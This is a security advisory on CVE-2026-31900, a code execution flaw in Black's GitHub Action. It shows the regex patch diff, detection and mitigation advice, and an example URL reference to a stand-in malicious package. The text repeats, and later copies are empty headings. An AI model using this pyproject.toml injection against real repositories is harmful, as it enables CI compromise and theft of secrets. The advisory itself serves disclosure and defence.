CVE-2026-31900: Black Python Formatter RCE Vulnerability

CVE-2026-31900 Overview

CVE-2026-31900 is a high-severity arbitrary code execution vulnerability in Black, the widely-used uncompromising Python code formatter. The vulnerability exists in Black's GitHub Action, which provides automated code formatting in CI/CD workflows. When the use_pyproject: true option is enabled, the action reads the Black version to install from the repository's pyproject.toml file. A malicious actor could craft a pull request that modifies this configuration file to specify a direct URL reference pointing to a malicious package repository, resulting in arbitrary code execution within the GitHub Action context.

Critical Impact
Attackers can achieve arbitrary code execution in GitHub Actions workflows, potentially gaining access to repository secrets, workflow permissions, and CI/CD pipeline compromise.

Affected Products

Black GitHub Action (versions prior to 26.3.0)
Black Python code formatter with use_pyproject: true configuration
CI/CD pipelines utilizing Black's GitHub Action for code formatting

Discovery Timeline

2026-03-11 - CVE CVE-2026-31900 published to NVD
2026-03-12 - Last updated in NVD database

Technical Details for CVE-2026-31900

Vulnerability Analysis

This vulnerability stems from improper input validation (CWE-20) in Black's GitHub Action version parsing mechanism. The action's main.py file uses a regular expression to validate and extract the Black version specification from pyproject.toml. The original regex pattern was overly permissive, allowing arbitrary strings after the "black" package name, including direct URL references to external repositories.

When a GitHub Action workflow processes a pull request with use_pyproject: true enabled, the action reads the Black version from the untrusted pyproject.toml file in the pull request. The insufficient validation allowed attackers to specify malicious package sources that would be installed and executed with the full permissions of the GitHub Action.

Root Cause

The root cause lies in the insufficient validation of the version specifier regex pattern in action/main.py. The original pattern ^black([^A-Z0-9._-]+.*)$ was too permissive, accepting any string following the package name rather than restricting input to valid PEP 440 version specifiers. This allowed direct URL references (e.g., black @ https://malicious.repo/package.tar.gz) to bypass validation and be installed during workflow execution.

Attack Vector

The attack vector is network-based, requiring an attacker with the ability to submit a pull request to a repository using the vulnerable Black GitHub Action. The exploitation path involves:

Identifying a target repository using Black's GitHub Action with use_pyproject: true
Creating a malicious fork and modifying pyproject.toml to include a direct URL package reference
Submitting a pull request to trigger the GitHub Action workflow
The malicious package executes arbitrary code with workflow permissions, enabling secret exfiltration or further compromise

python

# Security patch in action/main.py - Harden Black action version parsing (#5031)
 USE_PYPROJECT = os.getenv("INPUT_USE_PYPROJECT") == "true"
 OUTPUT_FILE = os.getenv("OUTPUT_FILE", default="")
 
-BLACK_VERSION_RE = re.compile(r"^black([^A-Z0-9._-]+.*)$", re.IGNORECASE)
+BLACK_VERSION_RE = re.compile(
+    r"^black((?:\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)"
+    r"(?:\s*,\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)*)\s*$",
+    re.IGNORECASE,
+)
 EXTRAS_RE = re.compile(r"\[.*\]")
 EXPORT_SUBST_FAIL_RE = re.compile(r"\$Format:.*\$")

Source: GitHub Commit Details

Detection Methods for CVE-2026-31900

Indicators of Compromise

Unexpected modifications to pyproject.toml files in pull requests, particularly in the Black version specification
GitHub Action logs showing installation of Black from non-PyPI sources or direct URL references
Unauthorized access to repository secrets or unexpected workflow behavior following pull request CI runs

Detection Strategies

Implement code review policies requiring approval for any changes to pyproject.toml or other dependency configuration files
Configure GitHub branch protection rules to require review from code owners for changes to CI/CD configuration files
Monitor GitHub Action audit logs for unusual package installation patterns or unexpected network requests during workflow execution

Monitoring Recommendations

Enable GitHub's security alerting for dependency-related changes in pull requests
Implement automated scanning for direct URL references in Python dependency specifications
Review GitHub Action workflow logs for installation commands containing URLs pointing to non-standard package repositories

How to Mitigate CVE-2026-31900

Immediate Actions Required

Upgrade Black to version 26.3.0 or later immediately across all repositories using the Black GitHub Action
Review recent pull requests for any suspicious modifications to pyproject.toml files
Audit GitHub Action workflow permissions and rotate any secrets that may have been exposed through CI/CD pipelines

Patch Information

The vulnerability has been fixed in Black version 26.3.0. The security patch hardens the version parsing regular expression to only accept valid PEP 440 version specifiers, rejecting direct URL references and other potentially malicious inputs. The fix is available in commit 0a2560b981364dde4c8cf8ce9d164c40669a8611. For detailed information, see the GitHub Security Advisory.

Workarounds

Disable the use_pyproject: true option in the Black GitHub Action and specify a fixed version directly in the workflow file
Configure GitHub Actions to run only after approval for external contributors, preventing automatic execution of workflows from untrusted pull requests
Implement workflow restrictions using GitHub's pull_request_target trigger cautiously with explicit checkout of trusted code only

bash

# Configuration example: Specify fixed Black version in GitHub Action workflow
# Instead of use_pyproject: true, pin the version directly
steps:
  - uses: psf/black@stable
    with:
      version: "26.3.0"
      # Avoid use_pyproject: true when accepting external pull requests

CVE-2026-31900 Overview

Critical Impact
Attackers can achieve arbitrary code execution in GitHub Actions workflows, potentially gaining access to repository secrets, workflow permissions, and CI/CD pipeline compromise.

Affected Products

Black GitHub Action (versions prior to 26.3.0)
Black Python code formatter with use_pyproject: true configuration
CI/CD pipelines utilizing Black's GitHub Action for code formatting

Discovery Timeline

2026-03-11 - CVE CVE-2026-31900 published to NVD
2026-03-12 - Last updated in NVD database

Technical Details for CVE-2026-31900

Vulnerability Analysis

Root Cause

Attack Vector

The attack vector is network-based, requiring an attacker with the ability to submit a pull request to a repository using the vulnerable Black GitHub Action. The exploitation path involves:

Identifying a target repository using Black's GitHub Action with use_pyproject: true
Creating a malicious fork and modifying pyproject.toml to include a direct URL package reference
Submitting a pull request to trigger the GitHub Action workflow
The malicious package executes arbitrary code with workflow permissions, enabling secret exfiltration or further compromise

python

# Security patch in action/main.py - Harden Black action version parsing (#5031)
 USE_PYPROJECT = os.getenv("INPUT_USE_PYPROJECT") == "true"
 OUTPUT_FILE = os.getenv("OUTPUT_FILE", default="")
 
-BLACK_VERSION_RE = re.compile(r"^black([^A-Z0-9._-]+.*)$", re.IGNORECASE)
+BLACK_VERSION_RE = re.compile(
+    r"^black((?:\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)"
+    r"(?:\s*,\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)*)\s*$",
+    re.IGNORECASE,
+)
 EXTRAS_RE = re.compile(r"\[.*\]")
 EXPORT_SUBST_FAIL_RE = re.compile(r"\$Format:.*\$")

Source: GitHub Commit Details

Detection Methods for CVE-2026-31900

Indicators of Compromise

Unexpected modifications to pyproject.toml files in pull requests, particularly in the Black version specification
GitHub Action logs showing installation of Black from non-PyPI sources or direct URL references
Unauthorized access to repository secrets or unexpected workflow behavior following pull request CI runs

Detection Strategies

Implement code review policies requiring approval for any changes to pyproject.toml or other dependency configuration files
Configure GitHub branch protection rules to require review from code owners for changes to CI/CD configuration files
Monitor GitHub Action audit logs for unusual package installation patterns or unexpected network requests during workflow execution

Monitoring Recommendations

Enable GitHub's security alerting for dependency-related changes in pull requests
Implement automated scanning for direct URL references in Python dependency specifications
Review GitHub Action workflow logs for installation commands containing URLs pointing to non-standard package repositories

How to Mitigate CVE-2026-31900

Immediate Actions Required

Upgrade Black to version 26.3.0 or later immediately across all repositories using the Black GitHub Action
Review recent pull requests for any suspicious modifications to pyproject.toml files
Audit GitHub Action workflow permissions and rotate any secrets that may have been exposed through CI/CD pipelines

Patch Information

Workarounds

Disable the use_pyproject: true option in the Black GitHub Action and specify a fixed version directly in the workflow file
Configure GitHub Actions to run only after approval for external contributors, preventing automatic execution of workflows from untrusted pull requests
Implement workflow restrictions using GitHub's pull_request_target trigger cautiously with explicit checkout of trusted code only

bash

# Configuration example: Specify fixed Black version in GitHub Action workflow
# Instead of use_pyproject: true, pin the version directly
steps:
  - uses: psf/black@stable
    with:
      version: "26.3.0"
      # Avoid use_pyproject: true when accepting external pull requests

CVE-2026-31900: Black Python Formatter RCE Vulnerability

CVE-2026-31900 Overview

Critical Impact

Affected Products

Discovery Timeline

Technical Details for CVE-2026-31900

Vulnerability Analysis

Root Cause

Attack Vector

Detection Methods for CVE-2026-31900

Indicators of Compromise

Detection Strategies

Monitoring Recommendations

How to Mitigate CVE-2026-31900

Immediate Actions Required

Patch Information

Workarounds

Experience the World’s Most Advanced Cybersecurity Platform

CVE-2026-31900: Black Python Formatter RCE Vulnerability

CVE-2026-31900 Overview

Critical Impact

Affected Products

Discovery Timeline

Technical Details for CVE-2026-31900

Vulnerability Analysis

Root Cause

Attack Vector

Detection Methods for CVE-2026-31900

Indicators of Compromise

Detection Strategies

Monitoring Recommendations

How to Mitigate CVE-2026-31900

Immediate Actions Required

Patch Information

Workarounds

Experience the World’s Most Advanced Cybersecurity Platform